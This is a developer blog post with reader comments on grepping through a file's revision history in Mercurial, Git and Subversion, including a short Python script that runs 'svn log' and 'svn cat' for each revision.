A problem that sometimes comes up with source-controlled code is to find a revision in which some line was deleted, or otherwise modified in a way that blame can’t decipher. In other words, we want to grep over all revisions of some file to know which revisions contain a certain pattern. Note that the goal is not to search in the commit log (which is trivial), but rather in the code itself.
Well, if you’re using Mercurial or Git, you’re lucky because both provide built-in methods for doing this.
With Mercurial, use hg grep.
With Git, you can either use git grep in conjunction with git rev-list, or git log -S (more details in this SO thread).
What about Subversion, though? SVN, to the best of my knowledge, does not have this functionality built-in. Moreover, SVN’s design makes this task inherently slow because no revisions past the last one are actually kept on your machine (unless the repository is local) and you have to ask the server for each revision. That’s a lot of network traffic.
That said, if you’re willing to tolerate the slowness (and sometimes there’s no choice!), then the following script – svnrevgrep – makes it as simple as with Git or Mercurial:
import re, sys, subprocess def run_command(cmd): """ Run shell command, return its stdout output. """ return subprocess.check_output(cmd.split(), universal_newlines=True) def svnrevgrep(filename, s): """ Go over all revisions of filename, checking if s can be found in them. """ log = run_command('svn log ' + filename) for ver in re.findall('r\d+', log, flags=re.MULTILINE): cmd = 'svn cat -r %s %s' % (ver.rstrip('r'), filename) contents = run_command(cmd) print('%s: %s' % (ver, 'found' if re.search(s, contents) else 'not found')) if __name__ == '__main__': if len(sys.argv) != 3: print('Usage: %s <path> <regex>' % sys.argv[0]) else: svnrevgrep(sys.argv[1], sys.argv[2])
It basically goes over all revisions of the file starting with the most recent one and looks for the pattern.
Note that while one could imagine using some kind of binary searching to find the first revision in which the regex appears (or doesn’t), this won’t work in the general case because code sometimes is added, then deleted, then re-added, then deleted again (this happens when refactoring or when reverting problematic commits).
Finally, if you find yourself doing the above frequently for a given repository, you may be better off with:
git svn clone <path> git grep <...>
Related posts:
May 22nd, 2012 at 18:27
This will fail on filenames with spaces in them. You should pass a list of command line tokens to
run_command()directly (e.g.
run_command(['svn', 'log', filename])) and drop the
split()
Also, be aware that
subprocess.check_output()needs Python >= 2.7.
May 23rd, 2012 at 10:32
Chris,
I agree about the spaces. This script is mainly aimed at Linux where spaces in filenames are rare, but as you mentioned it can be easily modified to support filenames with spaces.
November 11th, 2013 at 05:01
unbeliavably useful thanks! | http://eli.thegreenplace.net/2012/05/22/grep-through-code-history-with-git-mercurial-or-svn/ | CC-MAIN-2014-35 | refinedweb | 532 | 63.7 |
Resolving macros using the API
If you need to process macro expressions inside text values in your custom code, use the MacroResolver.Resolve method. Specify the string where you want to resolve macros as the method's input parameter.
For example:
using CMS.MacroEngine; ... // Resolves macros in the specified string using a new instance of the global resolver string resolvedTextGlobal = MacroResolver.Resolve("The current user is: {% CurrentUser.UserName %}");
The method evaluates the macros using a new instance of the global resolver and automatically ensures thread-safe processing.
Macro resolvers are system components that provide the processing of macros. The resolvers are organized in a hierarchy that allows child resolvers to inherit all macro options from the parent. The global resolver is the parent of all other resolvers in the system.
Resolving localization macros
If you only need to resolve localization macros in text, call the ResHelper.LocalizeString static method.
using CMS.Helpers; ... // Resolves localization macros in text string localizedResult = ResHelper.LocalizeString("{$general.actiondenied$}"); | https://docs.kentico.com/k9/macro-expressions/resolving-macros-using-the-api | CC-MAIN-2020-29 | refinedweb | 163 | 50.23 |
reg expr, extract word from string
Discussion in 'Perl Misc' started by joelix@gmail.com, Oct 7, 2005.:
- 370
- intrader
- Sep 26, 2005
Syntax bug, in 1.8.5? return not (some expr) <-- syntax error vsreturn (not (some expr)) <-- fineGood Night Moon, Jul 22, 2007, in forum: Ruby
- Replies:
- 9
- Views:
- 333
- Rick DeNatale
- Jul 25, 2007
reg expr. question (newbie-intermediate)Robin, Jan 22, 2004, in forum: Perl Misc
- Replies:
- 1
- Views:
- 197
- Tassilo v. Parseval
- Jan 22, 2004
reg expr, extract digit from string.joel, Mar 18, 2005, in forum: Perl Misc
- Replies:
- 4
- Views:
- 163
- John W. Krahn
- Mar 18, 2005
How to extract part of the text (htm) file after start word until end word?Guest, May 12, 2006, in forum: Perl Misc
- Replies:
- 4
- Views:
- 323
- Guest
- May 12, 2006 | http://www.thecodingforums.com/threads/reg-expr-extract-word-from-string.894591/ | CC-MAIN-2015-11 | refinedweb | 135 | 82.54 |
0
Hi
I am trying to write something that compiles and runs
correctly on both Linux and Windows. I am running bash
in Ubuntu on Linux, and I try to set environment variables
in the makefile just before the compile lines. I then write
something in the code like
int main() { #ifdef UBUNTU std::cout << "Ubuntu = true\n"; #else std::cout << "Ubuntu = false\n"; #endif return 0; }
No matter what variant of this I try (#if vs. #ifdef, UBUNTU vs $UBUNTU,
setting the environment variable on the command line before the make
command, etc. I always get "Ubuntu = false". Can someone set me straight
on how to get this working?
Dave | https://www.daniweb.com/programming/software-development/threads/375872/preprocessor-doesn-t-see-my-environment-variables | CC-MAIN-2018-39 | refinedweb | 111 | 70.33 |
Introduction to Web Application Projects
Microsoft Corporation
April 2006
Applies to:
Visual Studio 2005
Visual Studio .NET 2003
Summary: Find out how to use the new project type, the Web application project, as an alternative to the Web site project model already available in Visual Studio 2005. (27 printed pages)
Contents
Introduction.
Purpose of Web Application.
In This Paper
This paper describes Web application projects and offers information on when you might choose between a Web application project and a Web site project model in Visual Studio 2005. The paper also walks you through the following common scenarios:
- Creating a new Web application project in Visual Studio 2005.
- Migrating an existing Visual Studio .NET 2003 project to a Visual Studio 2005 Web application project.
In addition, an appendix lists known issues with Web application projects.
Installing Web Application Projects
Adding Web application projects to Visual Studio 2005 requires you to install both an update and an add-in to Visual Studio 2005. The two installations perform the following tasks:
- The update makes changes to Visual Studio 2005 that are required so the Web project conversion wizard and designer will work well with Web application projects. You can download the update from the Microsoft Visual Studio 2005 - Update to Support Web Application Projects page on the Microsoft Download Center Web site.
- The add-in makes the new Web application projects available in Visual Studio 2005. You can download it from the Visual Studio 2005 Web Application Projects page on the ASP.NET Developer Center..
Comparing Web Site Projects and Web Application Projects:
- Using FrontPage Server Extensions (FPSE). These are no longer required, but they are supported if your site already uses them.
- Using a local copy of IIS. The new project type supports both IIS and the built-in ASP.NET Development Server..
Scenario 1: Creating a New Web Application Project
This section walks you through creating a new Web application project. It also examines how page code is handled in a Visual Studio 2005 Web application project.
Note Web application projects do not work with Visual Web Developer Express Edition.
The examples shown here are in C#. The steps for working with Visual Basic are very similar, but file names and code will differ slightly.
Step 1: Create a New Project:
Figure 1. Creating a new Web Application Project
Name the project and specify a location. When you click OK, Visual Studio creates and opens a new Web project with a single page named Default.aspx, an AssemblyInfo.cs file (.vb file), and a Web.config file:
.
Step 2: Open and Edit the Page:
- You no longer have to switch the page to Design view to update the control declarations. The designer monitors both Design view and Source view and updates declarations appropriately.
- Control declarations in the base class of a page are honored and are not duplicated in a page's code-behind class.;} } }
Step 3: Build and Run the Project
Run the project in debug mode by pressing F5 or clicking Run in the Debug menu. By default, Web application projects use the built-in ASP.NET Development Server using a random port as the root site (for example, the site's URL might be):
>>IMAGE:
Figure 4. Setting output build location
After building the project, you can examine the results. In Solution Explorer, click Show All Files:
Figure 5. Results of building a Web application project
This works the same as it does in Visual Studio .NET 2003 ASP.NET Web projects.
Setting Build and Deployment Properties for Web Application:
.:
.
Customizing Deployment Options for Web Application Projects.
Scenario 2: Migrating a Visual Studio .NET 2003 Web Project to a Web Application Project.
Step 1: Install the Visual Studio 2005 Web Application Project Preview
Be sure you have installed Web Application Projects in Visual Studio 2005 by following the steps in the Installing Web Application Projects section earlier in this paper.
Step 2: Back Up Your Visual Studio .NET 2003 Projects. similar.
Step 4: Migrate the Solution to Visual Studio 2005
Close the solution in Visual Studio .NET 2003, and then start Visual Studio 2005. On the File menu, click Open File, and then browse to the .sln file for the solution you want to migrate. This launches the Visual Studio 2005 Conversion wizard:
..:
- Close the browser.
- In Solution Explorer, right-click the application's start page and then click Set as Start Page to ensure that the correct page is invoked when the application runs.
- Run the application again.
Step 6: Covert Code-Behind Classes to Partial Classes.
.
Step 7:.
.
The Future of Web Application Projects:
- Going forward, we will fully support both the Visual Studio 2005 Web site project model and Visual Studio 2005 Web application project model. You can choose whichever model works best for you.
- In future versions of Visual Studio, the Web application project model will be built in, and both the Web application project model and Web site project model will be supported.
Appendix A: Known Issues
This appendix lists known issues with Web application projects.
Issue 1: Data Scenarios
- There are known issues when using data-bound controls and SQL Server 2005 Express with the April 2006 release of Web application projects. For a list of issues and workarounds, see the whitepaper named "Using Data-Bound Controls and SQL Server Express with Web Application Projects," which is available on the Visual Studio 2005 Web Application Projects page on the ASP.NET Developer Center.
Issue 2: Visual Basic Inline Code Might Not Be Converted Correctly.
Issue 3: WSE and Web Application Projects:
- Start the configuration tool. In the Windows Start menu, click All Programs, click Microsoft WSE 3.0, and then click Configuration Tool.
- In the configuration tool, in the File menu, click Open.
- Select the Web.config file for the project.
Issue 4: Converting the Club Web Site Starter Kit (Visual Basic)
.
To add a namespace to an individual page:
- Open the page.
- Under the last @ Register directive, add an @ Import directive that references the namespace you want to use, as in the following example:
<%@ Register
<%@ Import Namespace="wap1" %>
To add a namespace to the project:
- Open the Web.config file.
- Add or edit the <namespaces> element as a child of the <pages> element, as in the following example:
<pages>
<namespaces>
<add namespace="wap1"/>
</namespaces></pages>
Issue 5: Converting the Personal Web Site Starter Kit (Visual Basic)
.
- Open the Member_List.aspx page.
- Change the type name in the ObjectDataSource declaration to be fully qualified, as in the following example:
<asp:ObjectDataSource TypeName="
wap1.MemberDetails" >
Issue 6: Converting a Visual Studio 2005 Web Site project to a Web Application Project. | https://msdn.microsoft.com/en-us/library/aa730880(VS.80).aspx | CC-MAIN-2017-22 | refinedweb | 1,108 | 57.47 |
Content-type: text/html
acl_delete_perm - Delete permissions from a set of permissions belonging to an ACL entry
Security Library (libpacl.a)
#include <sys/acl.h>
int acl_delete_perm(
acl_permset_t perms,
acl_perm_t perm_d);
Specifies the file permissions to be deleted (a combination of ACL_EXECUTE, ACL_READ, and ACL_WRITE). Specifies the permission set of the working storage internal representation ACL entry
NOTE: This function is based on Draft 13 of the POSIX P1003.6 standard. The function may change as the P1003.6 standard is finalized.
The acl_delete_perm() function deletes the specified permission in perm_d from the permission set. This function does not return an error if the ACL entry does not have any of the specified permissions turned on.
Upon successful completion, the acl_delete_perm() function returns a value of 0 (zero). Otherwise, a value of -1 is returned, and errno is set to indicate the error.
If the following condition occurs, the acl_delete_perm() function sets errno to the corresponding value: The permset_d parameter does not refer to a valid permission set.
The perm_d parameter does not contain valid file permission bits.
acl_add_perm(3), acl_clear_perm(3),acl_get_permset(3), acl_set_permset(3), acl_get_entry(3)
Security delim off | http://backdrift.org/man/tru64/man3/acl_delete_perm.3.html | CC-MAIN-2017-09 | refinedweb | 191 | 57.57 |
Back when I first started at HERE I had written a tutorial titled, Display HERE Maps within your Angular Web Application. In fact it was my first official tutorial since starting and since then I’ve received several similar requests around it. One popular request has been around taking the Angular web application and making it compatible with Ionic Framework.
In this tutorial we’re going to see how to build a progressive web application (PWA) using Ionic Framework that can be deployed on the web or on mobile devices running Android or iOS.
Take the following animated image of what we plan to accomplish:
As you can see, we have an interactive map available in both a web browser and on an Android device. This is the same application with the same code, running on both platforms. While we’re only showing an interactive map, it opens the door to further possibilities with the HERE JavaScript SDK.
Start a New Ionic Framework Project with the Ionic CLI
The first step towards being successful with this tutorial is to create a new project. We’re going to be using the Ionic CLI and we’re going to be building an Ionic 3.x application that uses Angular. Other versions of Ionic Framework will likely have different setup requirements.
Assuming you have the Ionic CLI installed, execute the following command:
The above command will create a blank project. While we won’t be using any Ionic plugins or third-party Angular dependencies, we will need to include some libraries to make use of HERE in our application.
Open the project’s src/index.html and include the following HERE JavaScript SDK dependencies:
<script src="" type="text/javascript" charset="utf-8"></script> <script src="" type="text/javascript" charset="utf-8"></script> <script src="" type="text/javascript" charset="utf-8"></script>
These libraries should be included within the
<body> tags, above the other libraries defined by the Ionic CLI. To get clarity of what our finished src/index.html file should look like, see the following:
<!DOCTYPE html> <html lang="en" dir="ltr"> <head> <meta charset="UTF-8"> <title>HERE Map Example</title> <meta name="viewport" content="viewport-fit=cover,"> <meta name="apple-mobile-web-app-capable" content="yes"> <meta name="apple-mobile-web-app-status-bar-style" content="black"> <script src="cordova.js"></script> <link href="build/main.css" rel="stylesheet"> </head> <body> <ion-app></ion-app> <script src="" type="text/javascript" charset="utf-8"></script> <script src="" type="text/javascript" charset="utf-8"></script> <script src="" type="text/javascript" charset="utf-8"></script> <script src="build/polyfills.js"></script> <script src="build/vendor.js"></script> <script src="build/main.js"></script> </body> </html>
Before proceeding to the next development steps, now would be a good opportunity to create a HERE developer account and obtain your application tokens. You’ll need both an app id and an app code for JavaScript to be able to use any of the HERE APIs.
Creating a HERE Map Component with Angular and Ionic Framework
Now that we have a basic project created for Ionic Framework, we need to create an Angular component to represent our HERE map. As seen in my previous tutorial, there are several ways to accomplish this in Angular, but for us, we should probably create an actual component that can be reused.
From the Ionic CLI, execute the following:
The above command will create an Angular component, configured for Ionic Framework. Eventually we’ll be able to use
<here-map> throughout the pages of our application.
Open the project’s src/components/here-map/here-map.html file and include the following:
<div #map</div>
The above line will act as a placeholder for our interactive map. We are giving it full height and width so that way it scales to the parent dimensions found in each of the pages that you create. The
#map attribute will allow us to find it in our TypeScript code.
Open the project’s src/components/here-map/here-map.ts file and include the following TypeScript logic:
import { Component, OnInit, ViewChild, ElementRef, Input } from '@angular/core'; declare var H: any; @Component({ selector: 'here-map', templateUrl: 'here-map.html' }) export class HereMapComponent implements OnInit { @ViewChild("map") public mapElement: ElementRef; @Input() public appId: any; @Input() public appCode: any; @Input() public lat: any; @Input() public lng: any; } } ); let behavior = new H.mapevents.Behavior(new H.mapevents.MapEvents(map)); } }
If you think the above TypeScript looks familiar, it is because I took it exactly from the previous Angular tutorial that I had written. As a refresher, we’ll walk through it again to explain what everything means.
First you’ll notice this line:
declare var H: any;
Because our JavaScript SDK doesn’t have any TypeScript type definitions, we need to declare the class we wish to use so we don’t get transpiler errors. Basically we’re saying to ignore the fact that
H won’t be recognized in TypeScript.
Remember that
#map we had in the HTML? The following line will allow us to gain access to it:
@ViewChild("map") public mapElement: ElementRef;
The
ViewChild matches the name, but the variable can be whatever you want. Each of the
Input annotations will reflect possible tag attributes to be passed when we try to use the
<here-map> tag.
Because the map will render after our view has finished loading, we have to do all of our logic in the
ngAfterViewInit method. In this method we configure the platform and display the map based on the information supplied as tag attributes.
Before we can start using our new component, we need to wire it up to Ionic Framework. As of now it is only an Angular component.
Open the project’s src/app/app.module.ts file and include'; @NgModule({ declarations: [ MyApp, HomePage ], imports: [ BrowserModule, ComponentsModule, IonicModule.forRoot(MyApp) ], bootstrap: [IonicApp], entryComponents: [ MyApp, HomePage ], providers: [ StatusBar, SplashScreen, {provide: ErrorHandler, useClass: IonicErrorHandler} ] }) export class AppModule {}
Notice in the above code that we have imported our
ComponentsModule and then added it to the
imports array of the
@NgModule block. That is the only change we’ve made to this file.
Use the Interactive HERE Map Component within Ionic Framework Pages
With the map component under control, now we can start using it in the pages of our application. We’re working with a blank project so we’ll have a single page to work with. Your project may vary and you’re definitely not limited to just a single page.
Open the project’s src/pages/home/home.html file and include the following:
<ion-header> <ion-navbar> <ion-title> HERE Maps Example </ion-title> </ion-navbar> </ion-header> <ion-content> <here-map</here-map> </ion-content>
Take note of the
<here-map> tag that we’re using. In this tag we’re passing our attributes which we’re catching on the other end. Just make sure you swap your app id and app code rather than use my placeholder values.
Conclusion
You just saw how to include an interactive HERE map in an Ionic Framework progressive web application (PWA). Out of the box you should be able to build for the web with the Ionic CLI, but if you wish to build for Android or iOS, you’ll need to have Apache Cordova and the various Apache Cordova requirements met. However, you won’t have to change any of your code once Apache Cordova is configured.
For this example we were using the HERE JavaScript SDK rather than the HERE Android SDK or HERE iOS SDK. | https://developer.here.com/blog/display-an-interactive-here-map-in-an-ionic-framework-application | CC-MAIN-2021-25 | refinedweb | 1,268 | 53 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.